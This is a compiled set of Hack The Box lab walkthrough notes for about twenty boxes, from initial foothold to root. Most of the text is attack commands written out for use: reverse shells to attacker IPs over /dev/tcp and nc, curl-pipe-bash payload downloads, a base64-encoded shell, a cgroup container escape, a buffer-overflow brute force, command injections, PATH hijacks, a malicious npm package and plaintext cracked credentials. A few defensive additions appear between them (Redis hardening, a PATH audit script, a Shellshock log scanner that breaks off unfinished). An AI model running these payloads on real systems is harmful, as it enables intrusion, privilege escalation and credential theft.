just put an executable payload as /tmp/update
Privilege_escalation(www-data->amrois->root)
steganography file /var/www/ssl/secure_notes/nineveh.png
`binwalk -e nineveh.png` will get a few files include ssh key pair
got username in public key; can try it with the private key, but it does not work
simpler way is ssh within the target machine with the key
OR do port knocking (which is why direct ssh fails)
`ps auxww` show there is 'knockd' running and /etc/knockd.conf has the sequence
`for i in 571 290 911; do nmap -Pn --host-timeout 100 --max-retries 0 -p $i 10.10.10.43 >/dev/null; done; ssh -i id_rsa_nineveh_amrois amrois@10.10.10.43`
Initial_Foothold
tcp/3000 check source code, found /api/admin/backup and /api/session in admin.js
found username and password hashes in /api/users
login with myP14ceAdm1nAcc0uNT:manchester and download myplace.backup
`cat myplace.backup | base64 -d > myplace.backup.decode; file myplace.backup.decode` 'Zip archive data'
`fcrackzip -D -p rockyou.txt myplace.backup.zip` OR zip2john then john crack, password=magicword
unzip, found cred mark:5AYRft73VtFpc84k in app.js of the zip, it works for ssh
Privilege_escalation
`ps auxww` found tom running '/usr/bin/node /var/scheduler/app.js' inspect the app.js
`mongo -u mark -p 5AYRft73VtFpc84k scheduler`
`db.tasks.insert({"cmd": "bash -c 'bash -i >& /dev/tcp/10.10.14.19/443 0>&1'"})`
tom is in 'admin' group `find / -group admin -ls 2>/dev/null `
which outputs only one file, /usr/local/bin/backup; the file is SUID root
according to /var/www/myplace/app.js the backup file is called with the -q arg
it can be done via buffer overflow (ippsec video, brute-forcing ASLR (address space layout randomization))
normal pattern_create will have badchars, other detail similar to Frolic
`msf-pattern_create -l 1000 -s ABCDEFGHIJKLMNOPQRSTUVWXYZ,abcdefghijklmnopqrstuvwxyz,0123456789`
OR just command injection(0xdf post):
backup -q "" '
> /bin/bash'
Initial_Foothold
HTB pdf shows it took 6 hours to finish the gobuster dir
gobuster dir found /backend which redirect to /backend/backend/auth/signin
login success with admin:admin
October CMS 1.0.412 - Multiple Vulnerabilities https://www.exploit-db.com/exploits/41936
it says .php5 is not in upload blacklist
upload php oneliner as payload.php5, and click 'public URL' to trigger
Privilege_escalation
linpeas.sh found -rwsr-xr-x 1 root root 7377 Apr 21 2017 /usr/local/bin/ovrflw
`cat /proc/sys/kernel/randomize_va_space` output '2' means ASLR(Address space layout randomization) is ON
ASLR can also be verified by `ldd /usr/local/bin/ovrflw | grep libc` multiple times to see if the address changes
addresses vary from 0xb7500000 to 0xb76ff000, which means brute forcing ASLR needs to loop a few hundred times
0xdf: `while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + "\x10\x83\x63\xb7" + "\x60\xb2\x62\xb7" + "\xac\xab\x75\xb7"'); done`
ippsec: https://youtube.com/watch?v=K05mJazHhF4&t=885
Initial_Foothold
gobuster dir found /music and click 'login' redirect to /ona
app version on page is 18.1.1 click 'download' show the app name 'OpenNetAdmin'
OpenNetAdmin 18.1.1 - Remote Code Execution https://www.exploit-db.com/exploits/47691
`./47691.sh http://10.10.10.171/ona/` got www-data shell
Privilege_escalation
linpeas.sh found cred ona_sys:n1nj4W4rri0R! from /var/www/html/ona/local/config/database_settings.inc.php
password reuse jimmy:n1nj4W4rri0R!
linpeas.sh found internal webserver from /etc/apache2/sites-enabled/internal.conf
`ls -al /var/www/internal/` `curl 127.0.0.1:52846/main.php` got encrypted RSA private key
ssh2john, cracked pass 'bloodninjas' and ssh as joanna
joanna `sudo -l` (ALL) NOPASSWD: /bin/nano /opt/priv
after entering 'nano', Ctrl+x is “Execute Command”; if you enter /bin/sh, it freezes because the stdin/stdout/stderr are messed up
`reset; /bin/sh 1>&0 2>&0` will fix
Initial_Foothold
based on the content of webpage and source code, google 'Java YAML deserialization'
https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858
https://github.com/artsploit/yaml-payload
https://0xdf.gitlab.io/2021/07/03/htb-ophiuchi.html
I did not successfully replicate the process to get the tomcat shell
Privilege_escalation
found cred admin:whythereisalimit in /opt/tomcat/conf/tomcat-users.xml
admin `sudo -l` (ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go
after inspecting 'index.go', we need to create a 'main.wasm' that can output '1' and 'deploy.sh' as payload
install the tool-kit https://github.com/WebAssembly/wabt and `apt install cmake`
`wasm2wat` converts main.wasm from the binary format into WebAssembly text format
To see the code more clearly use `wasm-decompile main.wasm` discover it returns '0' anyway
https://wasdk.github.io/WasmFiddle/ turn C_code into wasm and download
C_code: int info() {return 1; }
'deploy.sh' can write our public key into /root/.ssh/ (0xdf way), OR add a sudoer, OR add a root user
Initial_Foothold
nmap discover UDP/161 SNMP
`snmpbulkwalk -c public -v2c 10.10.11.136 > snmpbulkwalk_v2c.txt`
`cat snmpbulkwalk_v2c.txt | grep '\-u'` found cred daniel:HotelBabylon23 which works on ssh
Privilege_escalation
/etc/apache2/sites-enabled/pandora.conf shows the subdomain pandora.panda.htb running on localhost:80
port forward with '-L 9001:localhost:80' and find 'v7.0NG.742_FIX_PERL2020' in the webpage
https://www.sonarsource.com/blog/pandora-fms-742-critical-code-vulnerabilities-explained/
SQL injection (CVE-2021-32099), phar deserialization (CVE-2021-32098), remote file inclusion (CVE-2021-32100), cross-site request forgery (no CVE)
SQLi: `sqlmap -u 'http://localhost:9001/pandora_console/include/chart_generator.php?session_id=1' --time-sec=10 --batch -D pandora -T tsessions_php --dump`
the cookie 'g4e01qdgk36mfdh90hvcc54umq' stands out; it works when replaced in the browser
OR `wfuzz -u http://localhost:9001/pandora_console/ -b PHPSESSID=FUZZ -w sessions`
log in to the webpage as matt; CVE-2020-13851 Artica Pandora FMS 7.44 allows remote command execution via the events feature
https://github.com/hadrian3689/pandorafms_7.44
Also there is a way to upload a webshell: “Admin tools” > “File Manager”
after getting the matt shell: -rwsr-x--- 1 root matt 16816 Dec 3 15:58 /usr/bin/pandora_backup
the SUID doesn't work unless we write matt's ssh key and get a proper ssh session
`ltrace pandora_backup` shows it uses 'system' to call 'tar' without a full path
`export PATH=/dev/shm:$PATH` and create a payload file as /dev/shm/tar then run `/usr/bin/pandora_backup`
Initial_Foothold
extra header on tcp/80 'X-Backend-Server: office.paper'
source code shows: WordPress 5.2.3
gobuster vhost found chat.office.paper, a rocket.chat app with the hint: 'Registration can only be done using the secret registration URL!'
`wpscan --url http://office.paper --api-token $WPSCAN_API`
WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts https://www.exploit-db.com/exploits/47690
'http://office.paper/?static=1' shows secret registration URL 'http://chat.office.paper/register/8qozr226AhkCHZdyY'
register and log in; discover a chat bot ('recyclops help') that can read dirs/files
'file ../../../etc/passwd' shows username dwight, 'file ../hubot/.env' shows cred recyclops:Queenofblad3s!23
ssh succeeds with dwight:Queenofblad3s!23
Privilege_escalation
linpeas.sh found CVE-2021-3560 Polkit v0.105-26 Linux Privilege Escalation PoC by SecNigma
https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation
`./poc.sh -u=username -p=password` `su username`
Initial_Foothold
main page hint: 'implemented Fail2Ban', which means no bruteforce (hydra/gobuster)
source code leak: 'http://10.10.10.206/CuteNews/rss.php'
'http://10.10.10.206/CuteNews/' is a login page for CuteNews 2.1.2
CuteNews 2.1.2 - Remote Code Execution https://www.exploit-db.com/exploits/48800
OR manually upload an avatar in 'index.php?mod=main&opt=personal' and bypass the local js file filter
`exiftool -Comment='' avatar.png`
intercept with burp, edit 'avatar.png' into 'avatar.php'
find the img URL by clicking on it: http://passage.htb/CuteNews/uploads/avatar.php
Privilege_escalation
google 'CuteNews database': it does not use one but stores users in /var/www/html/CuteNews/cdata/users
decode: base64 -d => awk => hashcat => 'paul:atlanta1' 'egre55:egre55'
ssh as paul with the cred; found his ssh key, and his id_rsa.pub and authorized_keys end with 'nadav@passage'
ssh succeeds as nadav using that key; '.viminfo' has entries about 'dbus-1' and 'polkit-1'
https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/
`cp /etc/passwd /dev/shm/passwd` `echo 'username:$1$username$je5/ATIGzeDQw:0:0:/root/root:/bin/bash' >> /dev/shm/passwd`
`gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /dev/shm/passwd /etc/passwd`
`su username` password is 'password'
Initial_Foothold
nmap shows dms-pit.htb
`snmpwalk -c public -v1 10.10.10.241 . > snmpwalk.v1.txt`
discover 'pit.htb', user michelle and '/var/www/html/seeddms51x/seeddms'
login to /seeddms51x/seeddms with michelle:michelle; found an 'update note' giving version 5.1.15
download and inspect 'CHANGELOG': 5.1.11 - fix for CVE-2019-12744 (Remote Command Execution through unvalidated file upload), add .htaccess file to data directory
`curl http://dms-pit.htb/seeddms51x/data/.htaccess` returns Apache directives, but nmap shows tcp/80 is nginx/1.14.1, which ignores .htaccess
SeedDMS versions < 5.1.11 - Remote Command Execution https://www.exploit-db.com/exploits/47022
following the steps in 47022.txt gave RCE, but the reverse shell did not work
`curl http://dms-pit.htb/seeddms51x/data/1048576/30/1.php --data-urlencode "cmd=cat /var/www/html/seeddms51x/conf/settings.xml"`
found db cred seeddms:ied^ieY6xoquu
Failed: ssh michelle:ied^ieY6xoquu (needs a key)
Success: michelle:ied^ieY6xoquu logs in on tcp/9090 and gives a pretty web shell as michelle
Privilege_escalation
snmpwalk.v1.txt shows 'NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor'
`find . -name monitor -ls 2>/dev/null`; `cat /usr/bin/monitor` shows it runs /usr/local/monitoring/check*sh
`ls -ld /usr/local/monitoring` drwxrwx---+ 2 root root 122 May 14 14:40 /usr/local/monitoring
the '+' means there are additional ACLs set on the directory
`getfacl /usr/local/monitoring` shows user:michelle:-wx (write and traverse, no read)
create a payload (echo our key into /root/.ssh/authorized_keys) as /usr/local/monitoring/check_test.sh and run snmpwalk again
ssh as root with the key; for SELinux, dig into 0xdf's walkthrough [Beyond Root - SELinux]
Initial_Foothold as charix
http://10.10.10.84/browse.php?file=listfiles.php found pwdbackup.txt and phpinfo.php
pipe the output of `cat pwdbackup.txt` through `base64 -d` 13 times (copy and paste each round); got Charix!2#4%6&8(0
OR `data=$(cat pwd.b64); for i in $(seq 1 13); do data=$(echo $data | tr -d ' ' | base64 -d); done; echo $data`
guess the username 'charix' from the pass OR `view-source:http://10.10.10.84/browse.php?file=%2Fetc%2Fpasswd`
ssh charix:Charix!2#4%6&8(0
Initial_Foothold as www
Web Shell Via Log Poisoning
http://10.10.10.84/browse.php?file=notexist shows error and path: /usr/local/www/apache24/data/browse.php
http://10.10.10.84/browse.php?file=/usr/local/etc/apache24/httpd.conf found /var/log/httpd-error.log
use burp edit User-Agent: test:
http://10.10.10.84/browse.php?file=/var/log/httpd-error.log&cmd=id
got a shell as www; now SSH as charix
Privilege_escalation
found secret.zip in the user home, unzip with the pass, got 'secret'
`file secret` secret: Non-ISO extended-ASCII text, with no line terminators
`ps auxww` shows root running vnc on localhost:5901; per the walkthrough, 'secret' is a vnc key
Note: if anyone can identify the 'secret' file as a vnc key, please let me know
set up a SOCKS proxy with `ssh charix@10.10.10.84 -D 9050`; `tail /etc/proxychains.conf` should show socks4 127.0.0.1 9050
`proxychains vncviewer 127.0.0.1:5901 -passwd secret`
Initial_Foothold
gobuster dir found /test /index /torrent /rename
/test is a phpinfo page which has 'file_uploads ON'
/torrent: register and log in; found admin:admin12 in /torrent/readme/readme.html
upload a one-liner cmd.gif.php using burp
add image magic bytes before the php code in cmd.gif.php
edit 'Content-Type' in burp to 'image/gif' (my way) OR 'multipart/form-data' (0xdf's way)
`curl http://10.10.10.6/torrent/upload/ae19bcf0996a1fc5c2768850eab332df22c18416.php -d "cmd=id"`
Privilege_escalation 1
linpeas.sh found [CVE-2010-0832] PAM MOTD
https://www.exploit-db.com/download/14339
Privilege_escalation 2
Dirty Cow
Initial_Foothold
nmap found 6379/tcp open redis Redis key-value store 4.0.9
https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis
`ssh-keygen -t rsa` `(echo -e "\n\n"; cat rsakey.pub; echo -e "\n\n") > spaced_key.txt`
`cat spaced_key.txt | redis-cli -h 10.10.10.160 -x set ssh_key`
`redis-cli -h 10.10.10.160` `config set dir /var/lib/redis/.ssh` `config set dbfilename "authorized_keys"` `save`
`ssh -i rsakey redis@10.10.10.160`
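The foothold above works only because Redis 4 accepts unauthenticated CONFIG SET and writes its RDB dump to whatever dir/dbfilename it is told. As an added defensive example (not from the page or the box), a redis.conf fragment showing the exposed settings beside the hardened ones:

```conf
# --- exposed (the state the foothold relies on) ---
bind 0.0.0.0
protected-mode no
# requirepass not set: anyone who can reach tcp/6379 is a full admin
# CONFIG and SAVE available: 'config set dir' + 'config set dbfilename' + 'save'
# turn the RDB dump into an arbitrary file write as the redis user

# --- hardened ---
bind 127.0.0.1 ::1
protected-mode yes
requirepass CHANGE_ME_long_random_secret   # placeholder; Redis 6+ would use ACL users instead
# Remove the commands that retarget the dump or expose internals; the empty name
# deletes the command (on Redis 5+ also add REPLICAOF, which 4.0.9 does not have).
rename-command CONFIG ""
rename-command DEBUG ""
rename-command SLAVEOF ""
# Keep the dump in a dedicated data directory, never in the service account's home:
# the lines above pointed it at /var/lib/redis/.ssh/authorized_keys and ssh as redis worked.
dir /var/lib/redis/data
dbfilename dump.rdb
```

Pair this with a service account whose shell is `/usr/sbin/nologin` and a host firewall on tcp/6379: the authorized_keys trick needs both the file write and a login shell for the redis user.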
Privilege_escalation
linpeas.sh found /opt/id_rsa.bak
ssh2john and crack got password: computer2008
Failed: ssh as matt with the key and pass, because /etc/ssh/sshd_config has 'DenyUsers Matt'
Success: `su matt` with password computer2008
10000/tcp open http MiniServ 1.910 (Webmin httpd); login succeeds with matt:computer2008
Webmin 1.984 - Remote Code Execution (Authenticated) https://www.exploit-db.com/exploits/50809
`nc -nvlp 9001` `python3 50809.py -t https://10.10.10.160:10000 -c Matt:computer2008 -L 10.10.14.26 -P 9001 -LS 10.10.14.26:8080`
Initial_Foothold
enumerate the webpage with burp on; found the 301 redirect response has content
edit the response '302 Found' to '200 OK' and it appears logged in, bypassing the login check
go to /accounts.php, edit 302 to 200 again and create an account
download SITEBACKUP.ZIP and unzip got sourcecode of web root files
file_logs.php has an injection point: $output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
burp edit POST to /file_logs.php delim=comma;bash -c 'bash -i >%26 /dev/tcp/10.10.14.6/443 0>%261' and got www-data shell
Privilege_escalation
found root:mySQL_p@ssw0rd!:) in /home/m4lwhere/config.php
`mysql -h localhost -u root -p'mySQL_p@ssw0rd!:)'`
`use previse;select * from accounts;` got m4lwhere's hash
hashcat crack 'ilovecody112235!' and `su m4lwhere`
`sudo -l` shows (root) /opt/scripts/access_backup.sh
the script runs 'gzip' without specifying the full path
create a payload file /dev/shm/gzip, then `export PATH=/dev/shm:$PATH`, then run the sudo script; got root
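Both the pandora_backup/tar step above and this access_backup.sh/gzip step abuse the same defect: a program running as root resolves a command through the caller's PATH. The following POSIX shell auditor is an added example (not from the page or either box); its function names and the sample script it inspects are constructed for the demonstration:

```shell
#!/bin/sh
# Added example: audit a privileged script for the two conditions behind the
# pandora_backup/tar and access_backup.sh/gzip escalations:
#   (1) an external command invoked by bare name rather than absolute path, and
#   (2) a PATH entry the invoking user can write to (e.g. /dev/shm on the boxes).
# Heuristic only: it does not parse shell grammar, just the first word of each simple command.

# Keywords and builtins that never resolve through PATH.
BUILTINS='if then else elif fi for do done while until case esac in test export cd echo set unset local return exit shift read printf trap eval exec true false'

# audit_bare_commands FILE
# Print, one per line and de-duplicated, every command FILE invokes without an absolute path.
audit_bare_commands() {
    sed -e 's/#.*$//' "$1" \
      | tr ';|&(){}' '\n\n\n\n\n\n\n' \
      | awk -v skip="$BUILTINS" '
          BEGIN { n = split(skip, a, " "); for (i = 1; i <= n; i++) b[a[i]] = 1 }
          {
            for (i = 1; i <= NF; i++) {
              if ($i ~ /^[A-Za-z_][A-Za-z0-9_]*=/) continue   # VAR=value prefix, keep looking
              # report a plain name; anything starting with / or $ or a quote is not a PATH lookup
              if (!($i in b) && $i ~ /^[A-Za-z0-9_][A-Za-z0-9_.+-]*$/) print $i
              break
            }
          }' \
      | sort -u
}

# writable_path_dirs PATHSTRING
# Print each PATHSTRING entry the current user can write to. An empty entry or "."
# means the current directory, which the caller controls, so it is flagged too.
writable_path_dirs() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r d; do
        case "$d" in
            ''|.) printf '%s\n' '(current directory)' ;;
            *) if [ -d "$d" ] && [ -w "$d" ]; then printf '%s\n' "$d"; fi ;;
        esac
    done
}

# Demo on a constructed script modelled on the page's access_backup.sh.
demo() {
    tmp=$(mktemp -d)
    cat > "$tmp/access_backup.sh" <<'EOF'
#!/bin/bash
# constructed sample: gzip by bare name (hijackable), tar by absolute path (safe)
cd /var/www/file_access_logs || exit 1
gzip -c access.log > /var/backups/access.log.gz
/usr/bin/tar -czf /var/backups/www.tgz /var/www/html
EOF
    echo "bare commands in access_backup.sh:"
    audit_bare_commands "$tmp/access_backup.sh"
    echo "writable entries in PATH=/dev/shm:/usr/local/bin:/usr/bin:/bin as $(id -un):"
    writable_path_dirs "/dev/shm:/usr/local/bin:/usr/bin:/bin"
    rm -rf "$tmp"
}
demo
```

The fix on both boxes is the same: the privileged script pins PATH to root-owned directories (or calls /bin/tar and /bin/gzip by absolute path) and sudo keeps env_reset and secure_path so the caller's PATH never reaches it.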
Initial_Foothold
tcp/5080 gitlab register and login, found version 11.4.7 at /help
GitLab 11.4.7 - RCE (Authenticated) (2) https://www.exploit-db.com/exploits/49334
if base64-encoding the payload like ippsec, make sure the encoded string contains no '+' (add a space before encoding to change it)
49334.py: lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port} -e /bin/bash' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
49334_fixed.py: lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'echo YmFzaCAtYyAnL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjI2LzkwMDEgMD4mMSc= | base64 -d | bash ' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
`python3 49334_fixed.py -u username -p password -g http://10.10.10.220 -l 10.10.14.26 -P 9001`
There is a fixed one on github https://github.com/ctrlsam/GitLab-11.4.7-RCE
OR follow 0xdf and do it manually in New_project>Import_project>Repo_by_URL>Project_URL:
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/.git
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|curl http://10.10.14.8/shell.sh|bash\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
the manual payload is from https://hackerone.com/reports/299473
Privilege_escalation(container_git->container_root)
linpeas.sh found /opt/backup/gitlab.rb:gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"
`su root`
Privilege_escalation(container_root->root)
/opt/backup/docker-compose.yml has 'privileged: true'
cgroups Escape method
https://0xdf.gitlab.io/2021/05/17/digging-into-cgroups.html
root@gitlab:~# d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
root@gitlab:~# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@gitlab:~# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@gitlab:~# echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.8/shell.sh | bash' >/c;
root@gitlab:~# chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";
File System Escape method
`lsblk` |-sda2 8:2 0 18G 0 part /var/log/gitlab
`mount /dev/sda2 /mnt` `cat /mnt/root/root.txt`
Initial_Foothold
Metasploit Framework 6.0.11 - msfvenom APK template command injection https://www.exploit-db.com/exploits/49491
edit: payload = 'curl http://10.10.14.26/reverse-bash-i.sh|bash'
got shell as kid
Privilege_escalation
analyze /home/pwn/scanlosers.sh
`echo '1 2 ;curl http://10.10.14.26/reverse-bash-i.sh|bash #' > /home/kid/logs/hackers`
got shell as pwn
(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
msf6 > bash
Initial_Foothold
tcp/8080 gitbucket create an account and login
found cred tomcat:42MrHBf*z8{Z% in root>seal_market>tomcat>commits>"Updating tomcat configuration"
found hint 'remove mutual authentication for the dashboard' in root>seal_market>README.md
found web dirs: /manager/html /admin/dashboard /host-manager/html in root>seal_market>nginx>sites-enabled>default
Mutual authentication, also known as two-way authentication, is a security process in which entities authenticate each other before actual communication occurs.
In a network environment, this requires that both the client and the server must provide digital certificates to prove their identities.
https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
bypass Mutual authentication: https://seal.htb/manager;sth=test/html
login with tomcat:42MrHBf*z8{Z% got tomcat app manager and found .war deployer
`msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.26 LPORT=9001 -f war > shell.war`
got shell as tomcat
Privilege_escalation
pspy found `python3 /usr/bin/ansible-playbook /opt/backups/playbook/run.yml` running as UID=1000, which is luis
/opt/backups/playbook/run.yml has 'synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes'
according to https://docs.ansible.com/ansible/latest/collections/ansible/posix/synchronize_module.html#parameter-copy_links
the 'copy_links=yes' means 'Copy symlinks as the item that they point to (the referent) is copied, rather than the symlink.'
`ln -s /home/luis/.ssh/id_rsa /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/id_rsa`
`cp /opt/backups/archives/backup-2023-07-18-15:06:32.gz /dev/shm/key.gz ; gzip -dq /dev/shm/key.gz`
`ssh -i luis_key luis@10.10.10.250` `sudo -l` (ALL) NOPASSWD: /usr/bin/ansible-playbook *
https://gtfobins.github.io/gtfobins/ansible-playbook/
TF=$(mktemp); echo '[{hosts: localhost, tasks: [shell: /bin/sh /dev/tty 2>/dev/tty]}]' >$TF; sudo /usr/bin/ansible-playbook $TF
Initial_Foothold
gobuster dir https found /system-users.txt which shows username: Rohit password: company defaults
google pfSense default cred: admin:pfsense
login with Rohit:pfsense; found version 2.1.3
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection https://www.exploit-db.com/exploits/43560
`python3 43560.py --lhost 10.10.14.26 --lport 9001 --rhost 10.10.10.60 --username rohit --password pfsense`
listener got root
Initial_Foothold
gobuster vhost found exam.seventeen.htb
Exam Reviewer Management System 1.0 - ‘id’ SQL Injection https://www.exploit-db.com/exploits/50725
intercept with burp, save the request to get.req and run sqlmap on it; found 31234:autodestruction
the sqlmap dump shows 'date_uploaded: 2020-01-26' for Marksheet-finals.pdf, which contains the hint 'new webmail service mastermailer.seventeen.htb'
'mastermailer.seventeen.htb' is running roundcube; google roundcube with '2020' OR read /mastermailer/CHANGELOG; found version 1.4.2
CVE-2020-12640 https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2020-12640-PHP%20Local%20File%20Inclusion-Roundcube
`feroxbuster -u http://oldmanagement.seventeen.htb:8000/oldmanagement/files/31234/` found /papers upload papers.php (php-reverse-shell)
_plugins_qwerty=../../../../../../../../../var/www/html/oldmanagement/files/31234/papers&_step=2&_product_name=Seventeen+Webmail&submit=UPDATE+CONFIG
config file saved, we can get a www-data shell when we hit any roundcube page
OR simply overwrite the .htaccess file by uploading an empty .htaccess, which enables php code execution at /oldmanagement/files/31234/shell.php
Privilege_escalation(container_www-data->mark)
linpeas.sh found employeemanagementsystem/process/dbh.php:$dbPassword = "2020bestyearofmylife";
ssh mark:2020bestyearofmylife
Privilege_escalation(mark->kavi)
found cred root:IhateMathematics123# in /dev/shm/node_modules/db-logger/logger.js
ssh or su kavi:IhateMathematics123#
Privilege_escalation(kavi->root)
kavi `sudo -l` (ALL) /opt/app/startup.sh
sudo script has '/usr/bin/npm install $dep --silent'
Failed: `npm login` says 'user registration disabled', which means we can't poison the registry that way
on 'ubuntu 18.04' sudo runs the script as root but preserves $HOME, so we can edit /home/kavi/.npmrc to point at our kali
`cp /bin/bash /home/kavi/bash; mkdir test;cd test;echo 'registry=http://10.10.14.26:4873/' > ~/.npmrc` (moving to ./test is because '$dep' is not installed there, else it would not pull the registry)
kali# docker pull verdaccio/verdaccio ('verdaccio' can be found `curl localhost:4873` on target)
kali# docker run -it --rm --name verdaccio -p 4873:4873 -e 'VERDACCIO_PUBLIC_URL=http://10.10.14.26:4873' verdaccio/verdaccio
kali# npm adduser --registry http://localhost:4873 (To create a .npmrc file with authtoken)
`npm install loglevel` found target's loglevel is at 1.8.0 which means we need at least 1.8.1
kali# mkdir test;cd test;npm init;mousepad index.js
ADD: require("child_process").exec("chown root:root /home/kavi/bash; chmod 4755 /home/kavi/bash")
kali# npm publish --registry http://10.10.14.26:4873
`sudo /opt/app/startup.sh`
Initial_Foothold
nmap '623/udp open asf-rmcp' which has 'ipmi-rmcp'
webpage also mentions 'Bare Metal BMC automation', which leads to IPMI after googling it https://deploy.equinix.com/blog/redfish-and-the-future-of-bare-metal-server-automation/
use msf or ipmiPwner to get hash and crack got cred: Administrator:ilovepumkinpie1
msf auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_dumphashes
ipmiPwner https://github.com/c0rnf13ld/ipmiPwner
gobuster vhost found monitor.shibboleth.htb monitoring.shibboleth.htb zabbix.shibboleth.htb
login monitor.shibboleth.htb found zabbix version 5
Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated) https://www.exploit-db.com/exploits/50816
OR manually 'Create item' in 'host' and put payload in 'Key' as system.run[echo ... | base64 -d | bash] and hit 'test'
Privilege_escalation(zabbix->ipmi-svc)
`su ipmi-svc` with ilovepumkinpie1
Privilege_escalation(ipmi-svc->root)
found zabbix:bloooarskybluh in /etc/zabbix/zabbix_server.conf
`mysql -u zabbix -pbloooarskybluh` 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
CVE-2021-27928 https://github.com/Al1ex/CVE-2021-27928
kali# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.26 LPORT=9001 -f elf-so -o CVE-2021-27928.so
MariaDB [(none)]> SET GLOBAL wsrep_provider="/dev/shm/CVE-2021-27928.so";
and listener got root
Initial_Foothold
based on burp response headers and machine name, we can think of the famous ShellShock attack
gobuster dir found /cgi-bin/user.sh
`nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56` which confirms shellshock
ShellShock, AKA Bashdoor or CVE-2014-6271 https://en.wikipedia.org/wiki/Shellshock_(software_bug)
`curl -vvv http://10.10.10.56/cgi-bin/user.sh -A "() { :;}; echo; /usr/bin/id"`
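Added example, not from the writeup: the defender's view of the probe above, a scan of Apache combined-format access log lines for the `() { :;};` function-definition prefix in any field a CGI handler exports to the environment. The log lines, client addresses and timestamps are constructed.

```python
import re
from collections import Counter
from dataclasses import dataclass

# CVE-2014-6271 probes smuggle a Bash function definition such as
# `() { :;}; <command>` into a request field that a CGI handler exports as an
# environment variable (User-Agent, Referer, Cookie, ...). The regex keys on
# the function-definition prefix, tolerating spacing variants, rather than on
# any particular command that follows it.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Apache "combined" log format, one request per line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample log (not from the target): one benign request, one probe
# in the User-Agent like the curl on this page, one with the same payload in
# the Referer, and one unparseable line that must be skipped, not crash.
SAMPLE_LOG = [
    '10.10.14.5 - - [12/Oct/2017:10:11:02 +0000] "GET /index.html HTTP/1.1" 200 3016 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.10.14.26 - - [12/Oct/2017:10:12:31 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 138 "-" "() { :;}; echo; /usr/bin/id"',
    '10.10.14.26 - - [12/Oct/2017:10:12:40 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 138 "() { :;}; echo; /usr/bin/id" "curl/7.55.1"',
    "this line is not in combined format",
]


@dataclass
class Hit:
    ip: str
    time: str
    request: str
    field: str        # which request field carried the payload
    cgi_target: bool  # True when the request path is under /cgi-bin/


def scan_log(lines):
    """Return one Hit per log line whose request, referer or user-agent carries a Shellshock pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real deployment would count these separately
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK_RE.search(m.group(field)):
                request = m.group("request")
                hits.append(Hit(m.group("ip"), m.group("time"), request, field, "/cgi-bin/" in request))
                break  # one hit per line; the field tells the analyst where to look
    return hits


def sources(hits):
    """Probe count per client address, for triage."""
    return dict(Counter(h.ip for h in hits))


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
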